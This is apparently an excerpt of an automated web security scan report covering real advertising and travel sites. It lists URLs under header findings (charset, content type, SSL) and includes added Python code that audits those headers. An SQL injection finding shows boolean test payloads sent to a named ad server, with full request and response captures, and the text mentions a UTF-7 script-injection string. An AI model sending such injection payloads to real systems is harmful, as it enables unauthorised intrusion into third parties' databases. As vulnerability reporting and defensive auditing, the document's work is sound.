27.25. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

27.26. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

27.27. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

27.28. http://fls.doubleclick.net/activityi

27.29. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.30. http://hublotnation.com/

27.31. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

27.32. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

27.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.35. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.36. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.37. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.38. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.39. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

27.40. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.41. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

27.42. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

27.43. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

27.44. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

27.45. http://pixel.invitemedia.com/data_sync

27.46. http://showadsak.pubmatic.com/AdServer/AdServerServlet

27.47. http://tags.bluekai.com/site/2565

27.48. http://tags.bluekai.com/site/2625

27.49. http://uxm.thousandeyes.com/rest/json

27.50. http://www.aon.com/manchesterunited/

27.51. http://www.aon.com/unitedin2010/

27.52. http://www.aon.com/unitedin2010/index.jsp

27.53. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

27.54. http://www.cheaptickets.com/cacheable/ad.html

27.55. http://www.cheaptickets.com/cacheable/ad_empty.html

27.56. http://www.cheaptickets.com/cacheable/cedexis/radar.html

27.57. http://www.cheaptickets.com/cacheable/empty.html

27.58. http://www.cmegroup.com/advance/

27.59. http://www.cmegroup.com/advance/about.html

27.60. http://www.cmegroup.com/advance/build-1.html

27.61. http://www.cmegroup.com/advance/build-2.html

27.62. http://www.cmegroup.com/advance/build.html

27.63. http://www.cmegroup.com/advance/elements.html

27.64. http://www.cmegroup.com/advance/finance-1.html

27.65. http://www.cmegroup.com/advance/finance-2.html

27.66. http://www.cmegroup.com/advance/finance.html

27.67. http://www.cmegroup.com/advance/intro.html

27.68. http://www.cmegroup.com/advance/plant-1.html

27.69. http://www.cmegroup.com/advance/plant-2.html

27.70. http://www.cmegroup.com/advance/plant.html

27.71. http://www.cmegroup.com/advance/trade-1.html

27.72. http://www.cmegroup.com/advance/trade-2.html

27.73. http://www.cmegroup.com/advance/trade.html

27.74. http://www.cmegroup.com/advance/world-advances.html

27.75. http://www.orbitz.com/App/ViewDHTMLCalendar

27.76. http://www.orbitz.com/cacheable/ad.html

27.77. http://www.orbitz.com/cacheable/ad_empty.html

27.78. http://www.orbitz.com/cacheable/cedexis/radar.html

27.79. http://www.orbitz.com/cacheable/empty.html

27.80. http://www.orbitz.com/shared/adserverProxy.jsp

27.81. http://www.trip.com/box_ad_refresh.html

27.82. http://www9.effectivemeasure.net/favicon.ico

27.83. http://xml.premierleague.com/crossDomain.html
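
The two header findings in this report, "HTML does not specify charset" (this section) and "Content type incorrectly stated" (the next), are both about leaving the browser to guess. With no charset in the Content-Type header or in an early meta tag, the browser picks an encoding from the bytes; the historical exploit was UTF-7 auto-detection in old Internet Explorer, where a string such as +ADw-script+AD4- survived HTML escaping as plain ASCII and then decoded to <script>. Current browsers no longer auto-detect UTF-7, so today the charset finding is mainly a robustness issue, but the fix is the same one line. A declared type that does not match the body invites content sniffing, which is how a response meant to be an image or a download gets rendered as HTML; X-Content-Type-Options: nosniff switches that off. The example below is added to this page (not the scanner's code) and reproduces both checks plus the nosniff test, with a deliberately small stand-in for the browser's sniffer. The responses it runs over are constructed.

```python
import re
from typing import Dict, List, Optional


def header_charset(content_type: str) -> Optional[str]:
    """charset parameter of a Content-Type header value, lower-cased, or None."""
    m = re.search(r";\s*charset\s*=\s*\"?([\w.:-]+)", content_type, re.I)
    return m.group(1).lower() if m else None


def meta_charset(body: bytes) -> Optional[str]:
    """charset from <meta charset=..> or <meta http-equiv=Content-Type ..> in the first
    1024 bytes, roughly how far browsers pre-scan before committing to an encoding."""
    head = body[:1024].decode("latin-1", "replace")
    m = re.search(r"<meta[^>]*charset\s*=\s*[\"']?\s*([\w.:-]+)", head, re.I)
    return m.group(1).lower() if m else None


# Leading bytes that identify a type regardless of what the header says.
_MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"%PDF-", "application/pdf"),
]
_HTML_START = (b"<!doctype html", b"<html", b"<head", b"<body", b"<script", b"<iframe", b"<div", b"<a ")


def sniff(body: bytes) -> str:
    """A deliberately small version of the browser's own content sniffing."""
    for magic, mime in _MAGIC:
        if body.startswith(magic):
            return mime
    if body[:512].lstrip().lower().startswith(_HTML_START):
        return "text/html"
    return "application/octet-stream"


def audit(headers: Dict[str, str], body: bytes) -> Dict[str, object]:
    """Reproduce the two scanner checks plus the header that neutralises sniffing."""
    h = {k.lower(): v for k, v in headers.items()}
    ct = h.get("content-type", "")
    declared = ct.split(";")[0].strip().lower()
    sniffed = sniff(body)
    findings: List[str] = []
    if declared == "text/html" and not (header_charset(ct) or meta_charset(body)):
        findings.append("HTML does not specify charset")
    if declared and sniffed != "application/octet-stream" and sniffed != declared:
        findings.append(f"Content type incorrectly stated: declared {declared}, body looks like {sniffed}")
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    return {"declared": declared, "sniffed": sniffed, "findings": findings}


# Constructed responses, not captured from any host in this report.
NO_CHARSET = ({"Content-Type": "text/html"}, b"<html><body>Hotel search</body></html>")
META_ONLY = ({"Content-Type": "text/html"}, b'<html><head><meta charset="iso-8859-1"></head></html>')
WRONG_TYPE = ({"Content-Type": "image/gif", "X-Content-Type-Options": "nosniff"},
              b"<html><script>document.title</script></html>")
HARDENED = ({"Content-Type": "text/html; charset=utf-8", "X-Content-Type-Options": "nosniff"},
            b"<!DOCTYPE html><html><head><title>ok</title></head></html>")

if __name__ == "__main__":
    for label, (hdrs, body) in (("no charset", NO_CHARSET), ("meta only", META_ONLY),
                                ("wrong type", WRONG_TYPE), ("hardened", HARDENED)):
        print(label, audit(hdrs, body)["findings"])
```

The HARDENED sample is the target state for every HTML response: an explicit charset on the Content-Type header and nosniff, so neither the encoding nor the type is left to the client.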

28. Content type incorrectly stated

28.1. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1310831078

28.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1982940443

28.3. http://a1.interclick.com/getInPageJS.aspx

28.4. http://a1.interclick.com/getInPageJSProcess.aspx

28.5. http://a2.twimg.com/profile_images/1470671793/ProfilePhoto_normal.png

28.6. http://ad.reklamport.com/rpgetad.ashx

28.7. http://ads.pointroll.com/PortalServe/

28.8. http://adserver.teracent.net/tase/ad

28.9. http://amch.questionmarket.com/adscgen/st.php

28.10. http://api.connect.facebook.com/restserver.php

28.11. http://api.facebook.com/method/fql.query

28.12. http://ar.voicefive.com/b/rc.pli

28.13. http://as00.estara.com/fs/ruleaction.php

28.14. http://ats.tumri.net/ats/ats

28.15. http://aud.pubmatic.com/AdServer/Artemis

28.16. http://calls.esitemarketing.com/euinc/getnumdata.js

28.17. http://calls.esitemarketing.com/euinc/number-changer.js

28.18. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

28.19. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

28.20. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

28.21. http://event.adxpose.com/event.flow

28.22. http://expedia-www.baynote.net/baynote/tags3/common

28.23. http://hublotnation.com/wp/wp-admin/admin-ajax.php

28.24. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

28.25. http://i1.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.26. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.27. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_48x48.jpg

28.28. http://i2.goal.com/files/images/stats/goal/team-logos/8/98_20x20.jpg

28.29. http://img.agoda.net/images/default/bg_tthome.gif

28.30. http://img.agoda.net/images/default/google_search.gif

28.31. http://img.agoda.net/images/default/mouse_overbg.gif

28.32. http://ipinvite.iperceptions.com/Invitations/Javascripts/customInvites.aspx

28.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

28.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

28.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.36. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

28.37. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.77. http://sr2.liveperson.net/hcp/html/mTag.js

28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js

28.79. http://uxm.thousandeyes.com/rest/json

28.80. http://www.agoda.com/js/MainTextSearch.js

28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx

28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx

28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

28.84. http://www.cheaptickets.com/cacheable/empty.html

28.85. http://www.facebook.com/extern/login_status.php

28.86. http://www.getaroom.com/browse/market_deals

28.87. http://www.hotels.com/hoteldetails/urgencypopup.html

28.88. http://www.hotels.com/selectors/en_US/

28.89. http://www.hublot.com/favicon.ico

28.90. http://www.inadcoads.com/script.ashx

28.91. http://www.manutd.com/styles/greybox/gb_scripts.js

28.92. http://www.nike.com/nikefootball/global/xml/style.xml

28.93. http://www.nike.com/nikefootball/home/socialfeeds

28.94. http://www.nike.com/nikefootball/home/twitterfeed

28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

28.97. http://www.orbitz.com/cacheable/empty.html

28.98. http://www.revresda.com/favicon.ico

28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.110. http://www.sabrehospitality.com/favicon.ico

28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg

28.112. http://www.sabretravelnetwork.com/favicon.ico

28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

28.114. http://www.tripadvisor.com/HotelCheckRates

28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating

28.116. http://www.turkishairlines.com/data/gateway.aspx

28.117. http://www.turkishairlines.com/data/promotion.aspx

28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx

28.119. http://www9.effectivemeasure.net/v4/em_js

29. Content type is not specified

29.1. http://ad.technoratimedia.com/st

29.2. http://ad.yieldmanager.com/st

29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

29.5. http://pcm1.map.pulsemgr.com/uds/pc

29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf

29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif

29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html

29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif

29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif

29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif

29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif

29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

29.24. http://www.expedia.com/static/default/default/stubs/adserver.json

29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif

29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif

29.31. https://www.expedia.com/static/default/default/images/creditcard.gif

29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif

29.33. https://www.expedia.com/static/default/default/images/progressbar.gif

29.34. https://www.expedia.com/static/default/default/stubs/adserver.json

29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png

29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.39. http://www.orbitz.com/App/SubmitQuickSearch

30. SSL certificate

30.1. https://secure.mlb.com/

30.2. https://www.expedia.com/



1. SQL injection
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.yieldmanager.com/imp [atf parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The atf parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the atf parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /imp?Z=300x250&atf=1'%20and%201%3d1--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:37 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:37 GMT
Pragma: no-cache
Content-Length: 1800
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255150&ahcid=2583630&bimpd=lw-vFKdVdt5jymyFqiJARROI2dRcPU5t9ZR1nw7zLfGyYRMnE5CBXotWai1zkkh5aQyuKezoNUrOWJ5OOejNY_hJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14DGxlqQmkrMO95frYlC-2EecdQoEWgIftwRBNTCUIHlnIX2X-btI9IF1hQqZV-fS_9r7SRIRbOFhwT4uGv7bxlxoogu7v0QCZlqoLiKSE0YoB1I82nS-1Az844z0LvrxUVFSFAqZZv9Y6DfnxcXgN-CLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXuw9rtxn9I-6VbCSFXDmUXUF3DL4c-PvPhKwaZQZOxh4y_pKLDOLgieGxoRV6uf0r3GnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGRpqH141eggasYFFNO0SQRhrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhSIgs650GHZdIqJT1wU-IA6y0RdukcSHg45VLcxfHZDyvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxZLtOEV4-KNgW6xYUbQ9gzQ8BL-KZxXJBiWKRPNmIYZxasgEkMt3v87EW0sfEZwqdLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhKXO_wudIg0fd7Kg-WDT38ZQTxw0DEqZsZHYOIht_MLky730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVT8tugzAQ%2EBpuyMJ2eAn14MQhosJJaVHSckEGGxHxrEMFytfXamjvXa20o9mdWQ3EAa6k9IXAG15C7rpVADEqXUtyiCvTCoIAIs%2EHeIMc8xZtBTkNy2GmXh8l5KeoA38hIdQjSfTgXzwCZgqAnb3HD4YUOzavIjd5W%2DG6%2D9%2DgfvW6XyX632qFPslpuUfbP6%2EDc5tdmM1Q2MaXc3NM9xNLw5btLPsjTaw4LTdZKhqWnjvWHZtsjaT1T6ZZT9NoYGKgULcAk%2DJCLmAYZb%2DAcug0ySsFxlofhfehl1dhYOpgHxrIKQuNr%2E1NqilXvBdDl%2EdfXSFVXkslvwHt2G1w%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

Request 2

GET /imp?Z=300x250&atf=1'%20and%201%3d2--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0328.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:38 GMT
Pragma: no-cache
Content-Length: 1814
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=26676525&ahcid=1883426&bimpd=fOK9nK5SBPNMFPSaVcmC2Wth1-bS6WqeAcIEhmtqe7rT8nINU3UZBQr9rcUhUA1N8cRt7-4qdvT1s921wLY5MvhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14HnxF-CcwsJXwWAOdYeKznq8McqEAK-UmBlv3IIWyyUO3ZdHjZdUsAV-ly2h2S3imgukhFY036-UAkYbmGxOKupGFftJkIqwH9qF07DFDjClZLvv9Fj99WkgUM3N7Pk3wJLXqTBYYrDYXzyLBoFAQjyLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXul1BZwhrGK9kkKqWo_4Vc0HttRxMG_MxGL8BOWn5BaTgxnIpfRe_0nV8j-2uLFEcHGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnG_9FK7pAJgs0CD0PsBjgu6xrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhX3cv0bkaM0JpYmODU6vGPfofQ9TH1f1BuQDNWHQYeRUvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPhneywnUNb5R3ghoDZMAUmq5ZT6ApQ0N3A9ksY0B-eLzmL0jJk7x81x1HM4Bl65LQheFkuieZwAC6g7llKdWa2iLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhLu_A45Cp_byU6Eng9JHpJukR3NLoNbrFznL6rSwUDyDC730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0088&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBpuyAKbp1APTgwREY%2EQorbhgsA2IiU85FAF8fW1GtqeO1ppR7M7s6sjz9JhI0G5SRG1a%2DjpCFJb45VBXVXzPA%2DatmEgzXVt9RbuGE7H5XAnzhBm%2DBvE0n8oxsTBWfjQTw4GdwKAWbxHDwXX%2D%2Ei%2DmezsZaPb7H%2DNuM2zv1nkvS3qZGXpsoa736zDsU9Wfy0%2Dimv09toluT%2EHeXCN95qZkGMX5dQoctbF%2DXlJJT%2E%2EvfSkqu08TwrCCgxkMTCLivEFjBMfFkDHXopVI8DUyqVgHQd%2DYQoiFnJ1BVq0lvwy3LiYS1ENbOzL4bOvuShbLvgXrFBuYw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
